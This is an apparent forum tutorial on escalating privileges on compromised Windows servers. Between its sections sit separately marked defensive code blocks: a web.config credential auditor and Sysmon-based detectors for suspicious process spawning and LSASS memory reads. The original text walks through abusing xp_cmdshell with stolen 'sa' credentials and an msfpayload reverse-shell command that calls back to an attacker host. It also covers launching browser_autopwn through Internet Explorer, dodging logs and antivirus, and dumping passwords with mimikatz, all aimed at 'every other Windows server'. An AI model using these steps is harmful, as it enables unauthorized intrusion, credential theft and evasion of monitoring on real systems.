How to Hack Windows Servers Using Privilege Escalation


A lot of people here can hack websites, systems, mobiles and servers. But the thing that creates a problem is the error message: Access Denied! We know some methods to bypass certain restrictions using symlinks, privilege escalation using local root exploits and similar attacks. So let's start; I will explain how to do it.


Privilege Escalation Hacking

Here are some ways to bypass certain restrictions on Windows servers or to get SYSTEM privileges.
 

Using the “sa” account to execute commands through MSSQL queries via the ‘xp_cmdshell’ stored procedure.
Using a meterpreter payload to get a reverse shell on the target machine.
Using browser_autopwn. (Really…)
Using other tools like pwdump7, mimikatz, etc.

Using these tools is the very easy way, but the fun of hacking lies in the first three methods I wrote about above.

1. Using xp_cmdshell- 

A lot of the time on Windows servers we have read permission over the files of other IIS users, which is needed for this method to work correctly.

If we are lucky enough, we will find the login credentials of the “sa” account of the MSSQL server inside the web.config file of some website.

You must be thinking  why just “sa”?

Here, “sa” stands for Super Administrator and, as the name suggests, this user has all possible permissions over the server.

Using this, we can log into the MSSQL server locally (through our web backdoor) as well as remotely. I would recommend remote access because it does not generate webserver logs that would fill the log file with our web backdoor path.

So, after getting the “sa” account, we can log in remotely using HeidiSQL.

HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.

After logging into MSSQL server with sa account, we get a list of databases and their contents.

Now we can execute commands using MSSQL queries via xp_cmdshell (with administrator privileges).

Syntax for the query is-

xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-

xp_cmdshell 'whoami'



This shows that I am currently NT AUTHORITY\SYSTEM, which most of us know is the highest user in the Windows user hierarchy.

Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
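The weak point this method depends on is a web.config that carries the sa login and its password in clear text. The following is an added example, not code from the original post: a small audit script that parses a constructed web.config (the server names, logins and passwords in it are made up) and reports every connection string that logs in as sa or embeds a plaintext password, without echoing the secret itself. The fix it points at is the same in every case: a dedicated low-privilege SQL login, or integrated Windows authentication so no password sits in the file at all.

```python
import xml.etree.ElementTree as ET

# Constructed sample web.config; the server names, logins and passwords are made up.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="Shop"
         connectionString="Server=.\\SQLEXPRESS;Database=shop;User ID=sa;Password=Winter2013!"
         providerName="System.Data.SqlClient" />
    <add name="Reports"
         connectionString="Server=db01;Database=reports;Integrated Security=SSPI;"
         providerName="System.Data.SqlClient" />
    <add name="Blog"
         connectionString="Server=db01;Database=blog;User ID=blog_app;Pwd=hunter2;"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>
"""

ISSUE_SA = "logs in as sa"
ISSUE_PLAINTEXT = "embeds a plaintext password"


def parse_connection_string(cs):
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    params = {}
    for item in cs.split(";"):
        if "=" in item:
            key, value = item.split("=", 1)
            params[key.strip().lower()] = value.strip()
    return params


def audit_web_config(xml_text):
    """Return [(connection name, [issues])] for every risky connection string.

    Secrets are never included in the result; only the fact that one is present.
    """
    findings = []
    root = ET.fromstring(xml_text)
    section = root.find("connectionStrings")
    if section is None:
        return findings
    for entry in section.findall("add"):
        params = parse_connection_string(entry.get("connectionString", ""))
        issues = []
        # ADO.NET accepts both "User ID" and "UID" for the SQL login name.
        login = params.get("user id") or params.get("uid")
        if login is not None and login.lower() == "sa":
            issues.append(ISSUE_SA)
        # Both "Password" and "Pwd" carry a clear-text secret in the file.
        if "password" in params or "pwd" in params:
            issues.append(ISSUE_PLAINTEXT)
        if issues:
            findings.append((entry.get("name", "?"), issues))
    return findings


if __name__ == "__main__":
    for name, issues in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f"{name}: {', '.join(issues)}")
```

Run against a real file by reading it into `audit_web_config`; the "Reports" entry in the sample passes because integrated authentication carries no password and no sa login.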

2. Meterpreter Payload-

This method is quite easy and comes in useful when we cannot read the files of other users but we can execute commands.

Using Metasploit, generate a reverse shell payload binary.

For example-

msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor.

Run the multi/handler auxiliary at our end. (Make sure the ports are forwarded properly.)

Now it’s time to execute the payload.

If everything goes right, we will get a meterpreter session on the target machine, as shown below.

We can also use php, asp or other payloads.

3. Browser Autopwn-

This seems an odd way of hacking a server, but I myself found it a clever way to do the job, especially in scenarios where we are allowed to execute commands but cannot run executables (our payloads) because of software restriction policies in a domain environment.

Most Windows servers have an outdated Internet Explorer, and we can exploit it if we can execute commands.

I think it is clear by now what I’m trying to explain ;)

We can start Internet Explorer from command line and make it browse to a specific URL.

Syntax for  this-

iexplore.exe [URL]

Here URL would be the address of our server running browser_autopwn. After that we can use railgun to avoid antivirus detection.
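All three methods so far share one detectable trait: a server process that should never spawn an interactive program does so (sqlservr.exe running cmd.exe for xp_cmdshell, the IIS worker w3wp.exe running cmd.exe for the web backdoor or iexplore.exe for the autopwn trick), or a binary runs out of a web-writable directory. The following is an added example, not code from the original post: a parent/child lineage check run over constructed process-creation records in the shape of Sysmon Event ID 1 (the paths, times, user names and the 192.0.2.10 address are made up, and the web-writable directory list is an assumption to adapt per host).

```python
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record, in the shape of a Sysmon Event ID 1 entry."""
    ts: str
    parent_image: str
    image: str
    command_line: str
    user: str


def basename(path):
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"

# Constructed sample events; nothing here comes from a real host.
SAMPLE_EVENTS = [
    ProcessEvent("2013-08-01T10:00:01", r"C:\Windows\System32\services.exe", SQLSERVR,
                 "sqlservr.exe -sMSSQLSERVER", r"NT AUTHORITY\SYSTEM"),
    # method 1: xp_cmdshell makes the SQL Server service spawn a shell
    ProcessEvent("2013-08-01T10:05:12", SQLSERVR, r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c whoami", r"NT AUTHORITY\SYSTEM"),
    # method 2: a web backdoor under the IIS worker runs an uploaded binary
    ProcessEvent("2013-08-01T10:09:40", W3WP, r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c "C:\inetpub\wwwroot\uploads\1.exe"', r"IIS APPPOOL\DefaultAppPool"),
    ProcessEvent("2013-08-01T10:09:41", r"C:\Windows\System32\cmd.exe",
                 r"C:\inetpub\wwwroot\uploads\1.exe", "1.exe", r"IIS APPPOOL\DefaultAppPool"),
    # method 3: the worker process launches Internet Explorer towards an outside URL
    ProcessEvent("2013-08-01T10:15:03", W3WP, r"C:\Program Files\Internet Explorer\iexplore.exe",
                 "iexplore.exe http://192.0.2.10:8080/", r"IIS APPPOOL\DefaultAppPool"),
    # benign: an administrator opens a prompt from the desktop
    ProcessEvent("2013-08-01T10:20:00", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe", r"CORP\admin1"),
]

SHELLS = {"cmd.exe", "powershell.exe"}
BROWSERS = {"iexplore.exe"}
# Assumption: directories the web application itself can write to on this host.
WEB_WRITABLE_PREFIXES = (r"c:\inetpub\wwwroot\uploads",)


def classify(ev):
    """Return an alert label for a suspicious event, or None for anything else."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent == "sqlservr.exe" and child in SHELLS:
        return "sqlserver-spawned-shell"          # xp_cmdshell or similar
    if parent == "w3wp.exe" and child in SHELLS:
        return "iis-worker-spawned-shell"         # web backdoor executing commands
    if parent == "w3wp.exe" and child in BROWSERS:
        return "iis-worker-launched-browser"      # browser started from a web request
    if ev.image.lower().startswith(WEB_WRITABLE_PREFIXES):
        return "executable-run-from-web-writable-dir"
    return None


def detect(events):
    """Return (timestamp, label, parent, child) for every event that trips a rule."""
    alerts = []
    for ev in events:
        label = classify(ev)
        if label is not None:
            alerts.append((ev.ts, label, basename(ev.parent_image), basename(ev.image)))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The same rules map directly onto a SIEM query over Sysmon or Windows Security 4688 events (with command-line auditing enabled); the lineage, not the command text, is what makes them robust against renamed payloads.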


4. Using readily available tools-


Tools like pwdump and mimikatz can crack the passwords of Windows users.

pwdump7 gives out the NTLM hashes of the users, which can be cracked further using John the Ripper.

mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool’s interface is in a language other than English, so do watch tutorials on how to use it.

You can google them and learn how to use these tools and what they actually exploit to get the job done for you.

I hope you can now exploit every other Windows server.
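What mimikatz exploits is that a process with enough rights can open lsass.exe and read its memory, which is where the credentials live. That open is exactly what Sysmon Event ID 10 (ProcessAccess) records, together with the access mask that was granted. The following is an added example, not code from the original post: it decodes the mask into named process rights and flags any reader of lsass.exe that obtained PROCESS_VM_READ and is not on an allow list of known legitimate readers. The sample records are constructed (the paths and masks are made up, with simplified field names instead of Sysmon's SourceImage/TargetImage/GrantedAccess), and the allow list is an assumption to be replaced with the security agents actually installed.

```python
# Subset of the Win32 process access rights, ordered by bit value.
ACCESS_RIGHTS = [
    (0x0002, "PROCESS_CREATE_THREAD"),
    (0x0008, "PROCESS_VM_OPERATION"),
    (0x0010, "PROCESS_VM_READ"),
    (0x0020, "PROCESS_VM_WRITE"),
    (0x0400, "PROCESS_QUERY_INFORMATION"),
    (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"),
]
PROCESS_VM_READ = 0x0010

# Assumption: processes that legitimately read LSASS memory on this host.
# Replace with the EDR, backup and monitoring agents actually in use.
ALLOWED_READERS = {"csrss.exe", "wininit.exe", "msmpeng.exe"}

LSASS = r"C:\Windows\System32\lsass.exe"

# Constructed sample records in the shape of Sysmon Event ID 10; nothing here is real.
SAMPLE_ACCESS_EVENTS = [
    {"ts": "2013-08-01T11:00:00", "source": r"C:\Windows\System32\csrss.exe",
     "target": LSASS, "granted": 0x1FFFFF},                      # OS component, allow-listed
    {"ts": "2013-08-01T11:02:10", "source": r"C:\Users\web\AppData\Local\Temp\m.exe",
     "target": LSASS, "granted": 0x1010},                        # unknown binary reads LSASS memory
    {"ts": "2013-08-01T11:03:45", "source": r"C:\Windows\System32\taskmgr.exe",
     "target": LSASS, "granted": 0x1400},                        # query rights only, no memory read
    {"ts": "2013-08-01T11:05:30", "source": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "target": LSASS, "granted": 0x1410},                        # not allow-listed, reads memory
    {"ts": "2013-08-01T11:06:00", "source": r"C:\Users\web\AppData\Local\Temp\m.exe",
     "target": r"C:\Windows\System32\svchost.exe", "granted": 0x1010},  # target is not LSASS
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_access(mask):
    """Translate a GrantedAccess mask into the names of the rights it contains."""
    return [name for bit, name in ACCESS_RIGHTS if mask & bit]


def is_suspicious_lsass_access(ev):
    """True when a non-allow-listed process obtained memory-read access to lsass.exe."""
    if basename(ev["target"]) != "lsass.exe":
        return False
    if not ev["granted"] & PROCESS_VM_READ:
        return False
    return basename(ev["source"]) not in ALLOWED_READERS


def detect_lsass_access(events):
    """Return (source, mask as hex, decoded rights) for every suspicious record."""
    return [(basename(ev["source"]), hex(ev["granted"]), decode_access(ev["granted"]))
            for ev in events if is_suspicious_lsass_access(ev)]


if __name__ == "__main__":
    for alert in detect_lsass_access(SAMPLE_ACCESS_EVENTS):
        print(alert)
```

Keying the rule on PROCESS_VM_READ rather than on the tool's file name is what makes it hold when mimikatz is renamed or run from memory; the allow list is where the false positives are tuned, and every addition to it deserves a review of why that process needs to read LSASS at all.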
 

 
